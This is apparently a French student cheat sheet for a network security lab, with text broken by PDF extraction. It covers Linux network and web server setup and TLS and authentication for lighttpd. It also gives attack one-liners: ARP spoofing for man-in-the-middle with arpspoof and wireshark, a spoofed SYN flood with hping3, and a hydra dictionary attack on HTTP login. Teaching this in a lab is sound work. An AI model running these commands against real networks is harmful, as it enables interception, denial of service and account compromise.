

Configuration de réseaux

Configuration dynamique	Configuration statique
ifconfig eth0 <@IP> netmask <netmask>	nano /etc/netw- ork/interfaces
echo 1 > /proc/- sys/net/ipv4/ip_fo- rward <small>sur la passerelle</small>	dans interfaces auto eth0 // iface eth0 inet static
route add default gw <@IP passerelle> <small>sur</small> les autres machines	DI address 192.16- 8.0.1 // netmask 255.255.255.0
ssh <login>@<des- tination> // ping <de- stination>	DI gateway 192.16- 8.0.254 <small>si non-passe- relle</small>
tracertoute <destinat- ion>	DI up echo 1 > /proc/sys/net/i- pv4/ip_forward <small>si</small> passerelle
	ifup eth0 // ifdown eth0
nano /etc/hosts specifier nom pour adresse	ip, ifconfig, route et ping <small>verif valide</small>

Serveur web

startx <small>mode graphique</small>
/var/www/html <small>créer page simple</small>
busybox httpd -f -vv -h /var/www/html
URL locale http://127.0.0.1 <small>pour y accéder</small>
/etc/hosts <small>contacter site avec nom ex: alcest</small>

Man In The Middle

Principe <small>sous mode graphique</small>	Sécurisation
echo 1 > /proc/- sys/net/ipv4/ip_fo- rward <small>sur machine espion</small>	mkdir /etc/lighttpd/s- ecurity // cd /etc/ligh- ttd/security <small>repert</small> dédié au certif
arpspoof -t <@IP machine qui va se faire pwned> <@IP machine dont on souhaite usurper l'identité>	openssl req -new - newkey rsa:4096 - x509 -sha256 -days 365 -nodes -out alcest.crt -keyout alcest.key

Man In The Middle (cont)

wireshark -i eth0 -k <small>capturer</small> trafic	<i>Country name</i> : FR // <i>Common name</i> : <small>nom</small> configuré dans /hosts
echo "":<use- rname>:\$(busybox httpd - m ' <small>password</small> - d>)" > /etc/h- ttpd.conf <small>authen- tification au site</small> web	openssl x509 -in alcest.crt -text <small>lire le certif</small>
busybox httpd - f -vv -h /var/w- ww/html -r "- Restricted Area:" -c /etc/httpd.conf relancer avec auth	cat alcest.key alcest.crt > alcest.pem <small>certif serveur & clé pv</small>

nano /etc/lighttpd/conf- enabled/tls.conf	server.modules += ("mo- d_openssl") // \$SERVE- R["socket"] == "0.0.0.0:4- 43" { ssl.engine = "ena- ble" // ssl.pemfile = "/et- c/lighttpd/security/alce- st.pem" }
echo "<username>:\$(bu- sybox httpd -m ' <small>pass- word>')</small> " > <auth file> authentification	
nano /etc/lighttpd/conf- enabled/auth.conf	

Man In The Middle (cont)

server.modules += ("mod_auth", "mod_au- thn_file") auth.backend = "htpasswd" auth.backend.htpasswd.userfile = "/etc/l- ighttpd/security/alcest.auth" auth.require = ("/" => ("method" => "basic", "realm" => "- password required", "require" => "valid-- user"))
systemctl start lighttpd <small>lancer serv web</small>
systemctl status lighttpd <small>verif etat serv web</small>

Deny Of Service

hping3 --flood --syn --spooof <@IP source usurpée> <@IP victime>
htop <small>verif charge systeme</small>
tcpdump -i any <small>voir paquets</small>

Réseau étendu

Reseau etendu	Attaque par dictionnaire
/sbin/ifconfig	nano /opt/wordlist <small>config</small> mdp
/mnt/netta/a- pps/vnet/nemu- vnet netadm lancer reseau virtuel group1	most <file>
[nemu]-> slink()	hydra -V -f -l admin -P <fichier de mots de passe> http-get://<IP nightwish de l'autre groupe>
/mnt/netta/apps/vnet/nemu-vnet netadm lancer reseau virt grp2	
[nemu]-> clink('<@IP du groupe principal>') config sous-reseaux	

